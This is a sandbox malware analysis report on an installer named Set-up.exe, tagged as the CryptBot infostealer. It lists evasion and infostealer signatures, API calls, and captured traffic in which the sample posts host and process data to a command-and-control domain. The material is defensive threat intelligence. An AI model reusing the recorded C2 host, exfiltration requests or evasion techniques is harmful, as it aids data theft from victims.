Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name:Set-up.exe
Analysis ID:1582587
MD5:ae8ed41bd6aaae48ca2b4615d20f52df
SHA1:c5d5cfc1e82f7cc7d9c1cf4ed52c1866b35b0bb7
SHA256:9633f8eb37d7823206d9f14ad5dfc162c2c757f89726a9f917a42b7edc63244d
Tags:CryptBotexeuser-aachum
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Contain functionality to detect virtual machines
Infostealer behavior detected
Leaks process information
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Set-up.exe (PID: 2688 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: AE8ED41BD6AAAE48CA2B4615D20F52DF)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Set-up.exeReversingLabs: Detection: 26%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.5% probability
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00F3C070 GetVersion,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,GetLastError,__acrt_iob_func,_time32,GetLastError,__acrt_iob_func,0_2_00F3C070
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DE8E90 Sleep,_open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,0_2_00DE8E90
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A76080 memset,BCryptGenRandom,0_2_00A76080
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C9F6E0 wcscmp,CryptAcquireContextW,CryptGetUserKey,GetLastError,GetLastError,CryptReleaseContext,0_2_00C9F6E0
Source: Set-up.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: Set-up.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: Set-up.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A6255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_00A6255D
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A629FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,0_2_00A629FF
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C3E270 _errno,FindNextFileW,WideCharToMultiByte,strlen,_errno,calloc,MultiByteToWideChar,MultiByteToWideChar,_errno,GetLastError,MultiByteToWideChar,wcscpy,FindFirstFileW,free,_errno,0_2_00C3E270
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A6255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_00A6255D
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /jQURilAbAxjhrGAaBiUq1735578716 HTTP/1.1Host: home.eleventj11vt.topAccept: */*Content-Type: application/jsonContent-Length: 577923Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 34 33 30 31 38 37 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2
Source: global trafficHTTP traffic detected: GET /jQURilAbAxjhrGAaBiUq1735578716?argument=0 HTTP/1.1Host: home.eleventj11vt.topAccept: */*
Source: global trafficHTTP traffic detected: POST /jQURilAbAxjhrGAaBiUq1735578716 HTTP/1.1Host: home.eleventj11vt.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: Joe Sandbox ViewASN Name: RELCOM-ASRelcomGroup19022019RU RELCOM-ASRelcomGroup19022019RU
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B2A8C0 recvfrom,0_2_00B2A8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: GET /jQURilAbAxjhrGAaBiUq1735578716?argument=0 HTTP/1.1Host: home.eleventj11vt.topAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.eleventj11vt.top
Source: unknownHTTP traffic detected: POST /jQURilAbAxjhrGAaBiUq1735578716 HTTP/1.1Host: home.eleventj11vt.topAccept: */*Content-Type: application/jsonContent-Length: 577923Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 34 33 30 31 38 37 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Mon, 30 Dec 2024 23:33:07 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Mon, 30 Dec 2024 23:33:09 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: Set-up.exeString found in binary or memory: http://.css
Source: Set-up.exeString found in binary or memory: http://.jpg
Source: Set-up.exe, Set-up.exe, 00000000.00000003.1793675979.00000000013ED000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793748047.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793963248.000000000140B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1795591258.000000000140C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793878281.00000000013F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.eleventj11vt.top/jQ
Source: Set-up.exe, 00000000.00000003.1793675979.00000000013ED000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793748047.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793963248.000000000140B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1795591258.000000000140C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793878281.00000000013F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.eleventj11vt.top/jQ3
Source: Set-up.exeString found in binary or memory: http://home.eleventj11vt.top/jQURilAbAxjhrGAaBiUq1735578716
Source: Set-up.exe, 00000000.00000003.1793675979.00000000013ED000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1795571963.00000000013FB000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793748047.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793878281.00000000013F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.eleventj11vt.top/jQURilAbAxjhrGAaBiUq17355787165a1
Source: Set-up.exe, 00000000.00000003.1770170759.0000000001419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.eleventj11vt.top/jQURilAbAxjhrGAaBiUq1735578716?argument=0
Source: Set-up.exe, 00000000.00000003.1793675979.00000000013ED000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1795571963.00000000013FB000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793748047.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793878281.00000000013F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.eleventj11vt.top/jQURilAbAxjhrGAaBiUq1735578716fd4
Source: Set-up.exe, 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.eleventj11vt.top/jQURilAbAxjhrGAaBiUq1735578716http://home.eleventj11vt.top/jQURilAbAxjh
Source: Set-up.exeString found in binary or memory: http://html4/loose.dtd
Source: Set-up.exeString found in binary or memory: http://timestamp.digicert.com0
Source: Set-up.exeString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: Set-up.exeString found in binary or memory: https://curl.se/docs/hsts.html
Source: Set-up.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: Set-up.exeString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: Set-up.exeString found in binary or memory: https://httpbin.org/ip
Source: Set-up.exeString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A705B00_2_00A705B0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A76FA00_2_00A76FA0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B2B1800_2_00B2B180
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C500800_2_00C50080
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00BD00F00_2_00BD00F0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B300E00_2_00B300E0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00D6C0500_2_00D6C050
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DEE0500_2_00DEE050
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B0E0700_2_00B0E070
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DEA0000_2_00DEA000
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DB00320_2_00DB0032
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00D7C1A00_2_00D7C1A0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00CF01700_2_00CF0170
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00BD41700_2_00BD4170
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00CCE1380_2_00CCE138
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DD62D00_2_00DD62D0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00D242F00_2_00D242F0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DBE2F00_2_00DBE2F0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00AD62E00_2_00AD62E0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00AC62100_2_00AC6210
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00BF02000_2_00BF0200
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B2E3E00_2_00B2E3E0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B2C3200_2_00B2C320
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C503500_2_00C50350
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B824A00_2_00B824A0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00AAE4800_2_00AAE480
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00D1E4500_2_00D1E450
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00BC24300_2_00BC2430
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B304200_2_00B30420
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DCC4700_2_00DCC470
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DD04600_2_00DD0460
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DB44100_2_00DB4410
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00CCE5D00_2_00CCE5D0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DE05900_2_00DE0590
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DC85A00_2_00DC85A0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DD05600_2_00DD0560
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00D226E00_2_00D226E0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DA66B00_2_00DA66B0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A6E6200_2_00A6E620
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DDA6100_2_00DDA610
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00CA87D00_2_00CA87D0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C4A7800_2_00C4A780
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DE47800_2_00DE4780
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00BE87300_2_00BE8730
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B2C7700_2_00B2C770
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DC67300_2_00DC6730
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DB48A00_2_00DB48A0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DDA8000_2_00DDA800
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00BD49F00_2_00BD49F0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DDE9400_2_00DDE940
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DE09400_2_00DE0940
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B1C9000_2_00B1C900
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A6A9600_2_00A6A960
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A749400_2_00A74940
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C36AC00_2_00C36AC0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C58AC00_2_00C58AC0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00AE6AA00_2_00AE6AA0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DCEA700_2_00DCEA70
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B54A000_2_00B54A00
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C4ABC00_2_00C4ABC0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A6CBB00_2_00A6CBB0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DD8BF00_2_00DD8BF0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DC6BB00_2_00DC6BB0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00D20B700_2_00D20B70
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C90B600_2_00C90B60
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DBCB000_2_00DBCB00
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DA8B300_2_00DA8B30
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DECC900_2_00DECC90
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DA6C800_2_00DA6C80
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DA8C700_2_00DA8C70
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DA8DF00_2_00DA8DF0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DDCD800_2_00DDCD80
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B12DC00_2_00B12DC0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DD4D500_2_00DD4D50
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DE4D400_2_00DE4D40
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00BC6E900_2_00BC6E90
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00D5CE300_2_00D5CE30
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00D7AE300_2_00D7AE30
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C4AFC00_2_00C4AFC0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B2EF900_2_00B2EF90
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B28F900_2_00B28F90
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DB2F900_2_00DB2F90
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00D86F800_2_00D86F80
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00BEAFC00_2_00BEAFC0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B88F200_2_00B88F20
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A84F700_2_00A84F70
